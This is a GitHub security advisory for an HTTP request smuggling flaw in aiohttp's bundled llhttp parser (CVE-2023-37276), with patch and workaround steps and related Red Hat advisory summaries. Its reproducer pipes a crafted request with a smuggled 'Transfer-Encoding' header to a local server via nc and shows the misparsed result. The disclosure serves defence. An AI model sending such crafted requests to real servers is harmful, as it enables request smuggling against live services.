Headline
GHSA-45c4-8wx5-qw6w: aiohttp.web.Application vulnerable to HTTP request smuggling via llhttp HTTP request parser
Impact
aiohttp v3.8.4 and earlier are bundled with llhttp v6.0.6 which is vulnerable to CVE-2023-30589. The vulnerable code is used by aiohttp for its HTTP request parser when available which is the default case when installing from a wheel.
This vulnerability only affects users of aiohttp as an HTTP server (ie aiohttp.Application), you are not affected by this vulnerability if you are using aiohttp as an HTTP client library (ie aiohttp.ClientSession).
Reproducer
from aiohttp import web
async def example(request: web.Request):
headers = dict(request.headers)
body = await request.content.read()
return web.Response(text=f"headers: {headers} body: {body}")
app = web.Application()
app.add_routes([web.post('/', example)])
web.run_app(app)
Sending a crafted HTTP request will cause the server to misinterpret one of the HTTP header values leading to HTTP request smuggling.
$ printf "POST / HTTP/1.1\r\nHost: localhost:8080\r\nX-Abc: \rxTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\n0\r\n\r\n" \
| nc localhost 8080
Expected output:
headers: {'Host': 'localhost:8080', 'X-Abc': '\rxTransfer-Encoding: chunked'} body: b''
Actual output (note that 'Transfer-Encoding: chunked' is an HTTP header now and body is treated differently)
headers: {'Host': 'localhost:8080', 'X-Abc': '', 'Transfer-Encoding': 'chunked'} body: b'A'
Patches
Upgrade to the latest version of aiohttp to resolve this vulnerability. It has been fixed in v3.8.5: pip install aiohttp >= 3.8.5
Workarounds
If you aren’t able to upgrade you can reinstall aiohttp using AIOHTTP_NO_EXTENSIONS=1 as an environment variable to disable the llhttp HTTP request parser implementation. The pure Python implementation isn’t vulnerable to request smuggling:
$ python -m pip uninstall --yes aiohttp
$ AIOHTTP_NO_EXTENSIONS=1 python -m pip install --no-binary=aiohttp --no-cache aiohttp
References
- https://nvd.nist.gov/vuln/detail/CVE-2023-30589
- https://hackerone.com/reports/2001873
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2023-37276
aiohttp.web.Application vulnerable to HTTP request smuggling via llhttp HTTP request parser
Moderate severity GitHub Reviewed Published Jul 19, 2023 in aio-libs/aiohttp
Package
pip aiohttp (pip)
Affected versions
<= 3.8.4
Impact
aiohttp v3.8.4 and earlier are bundled with llhttp v6.0.6 which is vulnerable to CVE-2023-30589. The vulnerable code is used by aiohttp for its HTTP request parser when available which is the default case when installing from a wheel.
This vulnerability only affects users of aiohttp as an HTTP server (ie aiohttp.Application), you are not affected by this vulnerability if you are using aiohttp as an HTTP client library (ie aiohttp.ClientSession).
Reproducer
from aiohttp import web
async def example(request: web.Request): headers = dict(request.headers) body = await request.content.read() return web.Response(text=f"headers: {headers} body: {body}")
app = web.Application() app.add_routes([web.post('/’, example)]) web.run_app(app)
Sending a crafted HTTP request will cause the server to misinterpret one of the HTTP header values leading to HTTP request smuggling.
$ printf “POST / HTTP/1.1\r\nHost: localhost:8080\r\nX-Abc: \rxTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\n0\r\n\r\n” \ | nc localhost 8080
Expected output: headers: {’Host’: 'localhost:8080’, 'X-Abc’: ‘\rxTransfer-Encoding: chunked’} body: b’’
Actual output (note that ‘Transfer-Encoding: chunked’ is an HTTP header now and body is treated differently) headers: {’Host’: 'localhost:8080’, 'X-Abc’: '’, 'Transfer-Encoding’: ‘chunked’} body: b’A’
Patches
Upgrade to the latest version of aiohttp to resolve this vulnerability. It has been fixed in v3.8.5: pip install aiohttp >= 3.8.5
Workarounds
If you aren’t able to upgrade you can reinstall aiohttp using AIOHTTP_NO_EXTENSIONS=1 as an environment variable to disable the llhttp HTTP request parser implementation. The pure Python implementation isn’t vulnerable to request smuggling:
$ python -m pip uninstall --yes aiohttp $ AIOHTTP_NO_EXTENSIONS=1 python -m pip install --no-binary=aiohttp --no-cache aiohttp
References
- https://nvd.nist.gov/vuln/detail/CVE-2023-30589
- https://hackerone.com/reports/2001873
References
- GHSA-45c4-8wx5-qw6w
- https://nvd.nist.gov/vuln/detail/CVE-2023-37276
- aio-libs/aiohttp@9337fb3
- aio-libs/aiohttp@9c13a52
- https://hackerone.com/reports/2001873
- https://github.com/aio-libs/aiohttp/blob/v3.8.4/.gitmodules
Published to the GitHub Advisory Database
Jul 20, 2023
Related news
Red Hat Security Advisory 2024-2010-03 - An update is now available for Red Hat Satellite 6.15. The release contains a new version of Satellite and important security fixes for various components. Issues addressed include HTTP request smuggling, crlf injection, denial of service, file disclosure, and traversal vulnerabilities.
Red Hat Security Advisory 2024-1878-03 - An updated version of Red Hat Update Infrastructure is now available. RHUI 4.8 fixes several security an operational bugs, adds some new features and upgrades the underlying Pulp to a newer version. Issues addressed include HTTP request smuggling, crlf injection, denial of service, and traversal vulnerabilities.
aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. aiohttp v3.8.4 and earlier are bundled with llhttp v6.0.6. Vulnerable code is used by aiohttp for its HTTP request parser when available which is the default case when installing from a wheel. This vulnerability only affects users of aiohttp as an HTTP server (ie `aiohttp.Application`), you are not affected by this vulnerability if you are using aiohttp as an HTTP client library (ie `aiohttp.ClientSession`). Sending a crafted HTTP request will cause the server to misinterpret one of the HTTP header values leading to HTTP request smuggling. This issue has been addressed in version 3.8.5. Users are advised to upgrade. Users unable to upgrade can reinstall aiohttp using `AIOHTTP_NO_EXTENSIONS=1` as an environment variable to disable the llhttp HTTP request parser implementation. The pure Python implementation isn't vulnerable.